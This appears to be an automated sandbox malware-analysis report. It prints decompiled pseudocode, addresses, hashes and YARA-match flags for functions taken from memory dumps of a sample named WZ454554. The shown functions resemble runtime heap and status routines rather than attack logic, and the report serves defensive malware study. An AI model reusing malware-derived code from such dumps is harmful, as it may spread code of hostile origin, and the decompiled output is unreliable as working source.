                            0x00000000
                            0x00addc4c
                            0x00addc4e
                            0x00b23ae3
                            0x00b23ae8
                            0x00b23aea
                            0x00addce7
                            0x00addce9
                            0x00addcec
                            0x00addcee
                            0x00addcf0
                            0x00addcf3
                            0x00addcf5
                            0x00b23af2
                            0x00b23af5
                            0x00b23af5
                            0x00addd06
                            0x00addd08
                            0x00addd0b
                            0x00addd12
                            0x00b23b08
                            0x00addd18
                            0x00addd18
                            0x00addd18
                            0x00addd20
                            0x00addd23
                            0x00b23b16
                            0x00b23b16
                            0x00addd29
                            0x00addd2d
                            0x00addd36
                            0x00addd40
                            0x00addd51
                            0x00addd51
                            0x00addc54
                            0x00addc59
                            0x00addc59
                            0x00addc5e
                            0x00addc5e
                            0x00addc63
                            0x00addc66
                            0x00addc6b
                            0x00addc78
                            0x00addc7b
                            0x00addc81
                            0x00addc81
                            0x00addc83
                            0x00addc89
                            0x00000000
                            0x00000000
                            0x00addd7b
                            0x00addd7b
                            0x00addc8f
                            0x00addc8f
                            0x00addc92
                            0x00addc99
                            0x00addc9f
                            0x00addca5
                            0x00addcaa
                            0x00addcaa
                            0x00addcb3
                            0x00addcb8
                            0x00addcbb
                            0x00addcc1
                            0x00addccf
                            0x00addcd2
                            0x00addcd5
                            0x00addcd7
                            0x00addcda
                            0x00addcdc
                            0x00addcdc
                            0x00addce2
                            0x00addce4
                            0x00000000
                            0x00addce4

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e83c9e51843d9b9f6944a22d93d43fa6b4d38a3017cc1d13b72ea1e87fb2759
                            • Instruction ID: 89c61cbffa36e12c535d93a28c66ee06d9a33f9ed8e0ea07d218d488be1df6a1
                            • Opcode Fuzzy Hash: 2e83c9e51843d9b9f6944a22d93d43fa6b4d38a3017cc1d13b72ea1e87fb2759
                            • Instruction Fuzzy Hash: E8518D71A01615DFCF14CFA8C580AAEBBF6BF49310F24855AD59AAB341EB31AD44CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE2990, Relevance: .1, Instructions: 133COMMON
                            Download Yara Rule
                            C-Code - Quality: 97%
                            			E00AE2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				intOrPtr* _t69;
				intOrPtr _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t82;
				intOrPtr* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				intOrPtr _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0xb8ff00);
				E00B0D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xa91664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = L00AFE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xa91668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E00B351BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xa9166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E00AE2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = L00AC6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = L00AE2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								L00ACEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E00AE2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = L00AE2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E00AE2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E00B0D0D1(_t62);
				goto L28;
			}





















                            0x00ae2990
                            0x00ae2992
                            0x00ae2997
                            0x00ae29a3
                            0x00ae29a6
                            0x00ae29ab
                            0x00ae29ad
                            0x00ae29b2
                            0x00b25c80
                            0x00ae29b8
                            0x00ae29b8
                            0x00ae29bb
                            0x00ae29c0
                            0x00ae29c5
                            0x00ae29c6
                            0x00ae29c6
                            0x00ae29cb
                            0x00000000
                            0x00000000
                            0x00ae29cd
                            0x00ae29d0
                            0x00ae29d9
                            0x00ae29db
                            0x00ae29dd
                            0x00ae2a7f
                            0x00ae2a84
                            0x00ae2a87
                            0x00ae2a89
                            0x00b25ca1
                            0x00b25ca3
                            0x00000000
                            0x00ae2a8f
                            0x00ae2a8f
                            0x00000000
                            0x00ae2a8f
                            0x00000000
                            0x00ae29e3
                            0x00ae29e3
                            0x00ae29e3
                            0x00000000
                            0x00ae29e3
                            0x00ae29dd
                            0x00000000
                            0x00ae29db
                            0x00ae29e6
                            0x00ae29e9
                            0x00ae29eb
                            0x00ae29ed
                            0x00ae29f3
                            0x00ae29f5
                            0x00ae29f8
                            0x00ae29fa
                            0x00ae2a97
                            0x00ae2a9a
                            0x00ae2a9d
                            0x00ae2add
                            0x00000000
                            0x00ae2a9f
                            0x00ae2aa2
                            0x00ae2aa5
                            0x00ae2aa8
                            0x00ae2aab
                            0x00b25cab
                            0x00b25caf
                            0x00b25cc5
                            0x00b25cda
                            0x00b25cdc
                            0x00b25cdf
                            0x00b25ce5
                            0x00000000
                            0x00b25ceb
                            0x00b25ced
                            0x00b25cee
                            0x00000000
                            0x00b25cee
                            0x00b25cb1
                            0x00b25cb4
                            0x00b25cb9
                            0x00b25cbb
                            0x00000000
                            0x00b25cbd
                            0x00b25cbd
                            0x00000000
                            0x00b25cbd
                            0x00b25cbb
                            0x00ae2ab1
                            0x00ae2ab1
                            0x00ae2ac4
                            0x00ae2ac6
                            0x00ae2ac6
                            0x00000000
                            0x00ae2ac6
                            0x00ae2aab
                            0x00000000
                            0x00ae2a00
                            0x00ae2a09
                            0x00ae2a0e
                            0x00ae2a21
                            0x00ae2a24
                            0x00ae2a35
                            0x00ae2a3a
                            0x00ae2a3d
                            0x00ae2a42
                            0x00ae2a59
                            0x00ae2a59
                            0x00ae2a5c
                            0x00ae2a5f
                            0x00ae2a5f
                            0x00ae29fa
                            0x00ae29f3
                            0x00ae2a64
                            0x00ae2a64
                            0x00ae2a6b
                            0x00ae2a6b
                            0x00ae2a6d
                            0x00ae2a72
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c0b55aac58b4cb258b4744e5b2dfe8b693869a95527691176dead8b46a7f3a01
                            • Instruction ID: 3b58171a83d3ba85af8d4b24b25fda449dea1b4ef388d8a8886de2f056e24695
                            • Opcode Fuzzy Hash: c0b55aac58b4cb258b4744e5b2dfe8b693869a95527691176dead8b46a7f3a01
                            • Instruction Fuzzy Hash: 33517871A00259DFDF25DF56C880ADEBBB9FF48350F148069F804AB261D7318D52CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE4BAD, Relevance: .1, Instructions: 131COMMON
                            Download Yara Rule
                            C-Code - Quality: 85%
                            			E00AE4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				short _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				void* _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0xbad360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					L00ABCC50(_t86);
					L11:
					return L00AFB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0xba8504
				E00AD2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E00AFFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E00AFB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L00AD4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = L00ABCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0xba8504
								L00ACFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								L00AE4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                            0x00ae4bad
                            0x00ae4bbf
                            0x00ae4bc2
                            0x00ae4bc6
                            0x00ae4bcd
                            0x00ae4bd9
                            0x00b267fe
                            0x00b26800
                            0x00ae4ccc
                            0x00ae4ccd
                            0x00ae4cb7
                            0x00ae4cc9
                            0x00ae4cc9
                            0x00ae4bdf
                            0x00ae4be5
                            0x00000000
                            0x00000000
                            0x00ae4beb
                            0x00ae4bef
                            0x00000000
                            0x00000000
                            0x00ae4bf5
                            0x00ae4bf9
                            0x00ae4c06
                            0x00ae4c0b
                            0x00ae4c17
                            0x00ae4c1c
                            0x00ae4c1f
                            0x00ae4c25
                            0x00ae4c33
                            0x00ae4c3d
                            0x00ae4c40
                            0x00ae4c43
                            0x00ae4c47
                            0x00ae4c4d
                            0x00ae4c53
                            0x00ae4c54
                            0x00ae4c55
                            0x00ae4c56
                            0x00ae4c5b
                            0x00ae4c5c
                            0x00ae4c63
                            0x00ae4c6b
                            0x00000000
                            0x00000000
                            0x00b26776
                            0x00b26784
                            0x00b26784
                            0x00b2679f
                            0x00b267a7
                            0x00b267af
                            0x00b267ce
                            0x00000000
                            0x00b267b1
                            0x00b267b7
                            0x00b267b8
                            0x00b267c1
                            0x00b267d3
                            0x00b267d9
                            0x00b267dd
                            0x00ae4c94
                            0x00ae4c94
                            0x00ae4c98
                            0x00ae4c9c
                            0x00ae4ca3
                            0x00b267f4
                            0x00b267f4
                            0x00ae4cb5
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00ae4cb5
                            0x00ae4c79
                            0x00ae4c7e
                            0x00ae4c89
                            0x00ae4c8b
                            0x00ae4c8f
                            0x00ae4c8f
                            0x00000000
                            0x00ae4c89
                            0x00b267c3
                            0x00000000
                            0x00b267c3
                            0x00b267af
                            0x00ae4c73
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b01fe4295e6f74cb78defe1023baec59fee1633cec01004bf3c7856257a10e7
                            • Instruction ID: 57744244a8a5e241cd0f84c8b658deb0bf580e933460452216d66599ec74d4af
                            • Opcode Fuzzy Hash: 6b01fe4295e6f74cb78defe1023baec59fee1633cec01004bf3c7856257a10e7
                            • Instruction Fuzzy Hash: E641C031A012689BCB20DF65DA41FEEB7B8EF49710F1104A9E90DAB351DB34DE80CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041E71D, Relevance: .1, Instructions: 122COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: df3f62feed66855c2ccb06e4dc852a625c94ceaf9c5bf8f2d0a24d4a77613a20
                            • Instruction ID: e0f2a213bc3353da90b2ab39c6f5a2f4ecff6d5b4d3d5b7f7fb0206f26784021
                            • Opcode Fuzzy Hash: df3f62feed66855c2ccb06e4dc852a625c94ceaf9c5bf8f2d0a24d4a77613a20
                            • Instruction Fuzzy Hash: 745131369487C2DFE710DF78D89A6413FB2E386334708038EC9A24B1D2C774256ACB45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B7AA16, Relevance: .1, Instructions: 120COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00B7AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E00B7ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = L00B7AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = L00B7AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(L00B5CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L00AD77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(L00AD7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						L00B7131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(L00B5CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                            0x00b7aa1f
                            0x00b7aa21
                            0x00b7aa23
                            0x00b7aa2b
                            0x00b7aa30
                            0x00b7aa36
                            0x00b7aa39
                            0x00b7aa42
                            0x00b7aa75
                            0x00b7aa7a
                            0x00b7aa7c
                            0x00b7aa7c
                            0x00b7aa88
                            0x00b7aa8a
                            0x00b7aa8f
                            0x00b7ab02
                            0x00b7ab04
                            0x00b7aa99
                            0x00b7aaa8
                            0x00b7aaaf
                            0x00b7aab3
                            0x00b7aacc
                            0x00b7aad1
                            0x00b7aad6
                            0x00b7aae0
                            0x00b7aaf3
                            0x00b7aaf9
                            0x00b7aafe
                            0x00b7aafe
                            0x00b7aaf3
                            0x00b7aad6
                            0x00b7aab3
                            0x00b7ab07
                            0x00b7ab0a
                            0x00b7ab11
                            0x00b7ab23
                            0x00b7ab13
                            0x00b7ab1c
                            0x00b7ab1c
                            0x00b7ab2b
                            0x00b7ab44
                            0x00b7ab44
                            0x00b7ab51
                            0x00b7ab51
                            0x00b7aa44
                            0x00b7aa47
                            0x00b7aa4c
                            0x00000000
                            0x00000000
                            0x00b7aa5a
                            0x00b7aa64
                            0x00b7aa72
                            0x00000000
                            0x00b7aa66
                            0x00b7aa66
                            0x00b7aa68
                            0x00b7aa6a
                            0x00000000
                            0x00b7aa6a

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                            • Instruction ID: 0c299c632ffd58239cd1f4617a012158ec48b9b675b98d0a12eb0a68b2724b17
                            • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                            • Instruction Fuzzy Hash: 1D31C232B002046BDB559B69C885BBFF7EBEFC4310F15C0A9E829A7391DA749D04CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AC8A0A, Relevance: .1, Instructions: 120COMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E00AC8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0xbad360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return L00AFB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E00ACE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0xa91180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = L00AE1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							L00AF3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E00AC8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                            0x00ac8a0a
                            0x00ac8a1c
                            0x00ac8a23
                            0x00ac8a2e
                            0x00ac8a30
                            0x00ac8a36
                            0x00ac8a3c
                            0x00ac8a3e
                            0x00ac8a4a
                            0x00ac8a52
                            0x00ac8a9c
                            0x00ac8aae
                            0x00ac8a58
                            0x00ac8a5e
                            0x00ac8a6a
                            0x00ac8a6f
                            0x00ac8a75
                            0x00ac8a7d
                            0x00ac8a85
                            0x00ac8a86
                            0x00ac8a89
                            0x00ac8a93
                            0x00ac8a99
                            0x00ac8a9b
                            0x00000000
                            0x00ac8aaf
                            0x00ac8abe
                            0x00ac8ac3
                            0x00ac8acb
                            0x00ac8ad7
                            0x00ac8ae0
                            0x00ac8af1
                            0x00000000
                            0x00ac8af1
                            0x00ac8acd
                            0x00ac8ad5
                            0x00ac8afb
                            0x00ac8afd
                            0x00ac8aff
                            0x00ac8b07
                            0x00ac8b22
                            0x00ac8b24
                            0x00ac8b2a
                            0x00ac8b2e
                            0x00ac8b3f
                            0x00ac8b78
                            0x00ac8b41
                            0x00ac8b52
                            0x00ac8b54
                            0x00ac8b5c
                            0x00ac8b74
                            0x00ac8b74
                            0x00ac8b5c
                            0x00ac8b3f
                            0x00ac8b5e
                            0x00ac8b61
                            0x00ac8b64
                            0x00ac8b64
                            0x00ac8b6c
                            0x00ac8b6c
                            0x00ac8b11
                            0x00b19cd5
                            0x00b19cd5
                            0x00ac8b17
                            0x00ac8b1a
                            0x00ac8b1a
                            0x00000000
                            0x00ac8ad5
                            0x00ac8a89

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f5a39e2b47c99e4fc5be2e52629309ea1ef4d52300b75e943afdd96d6da39b0
                            • Instruction ID: 291056c637bd47610a3f26f0f83b9a8af614c405c52177e4bbce120c13226c9f
                            • Opcode Fuzzy Hash: 3f5a39e2b47c99e4fc5be2e52629309ea1ef4d52300b75e943afdd96d6da39b0
                            • Instruction Fuzzy Hash: A64151B1A0022C9BDB24DF55CC88FA9B3F4FB54340F1245EAE91997252EB749E80CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401208, Relevance: .1, Instructions: 119COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 78fcd7245a946dcbe966814c69f8ae369ad522458a303f0803b43fee51d8adfc
                            • Instruction ID: 7e16a01bce4b7d7c49221758d57219d85fa286cca12905a0178eefb2a4479c73
                            • Opcode Fuzzy Hash: 78fcd7245a946dcbe966814c69f8ae369ad522458a303f0803b43fee51d8adfc
                            • Instruction Fuzzy Hash: C6417375A0060A9BCB08CFA9D8819AFFBB5FF88310F10C27ED919A7351D334A951CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B822AE, Relevance: .1, Instructions: 116COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00B822AE(void* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				void* _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				void* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E00B821E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0xa9ac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0xa9ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0xa9ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0xa9ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0xa9ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0xa9ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0xa9ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0xa9ac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0xba6110; // 0x2f755769
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0xba6110 ^ _t117) & 0x000000ff | 0x00000200;
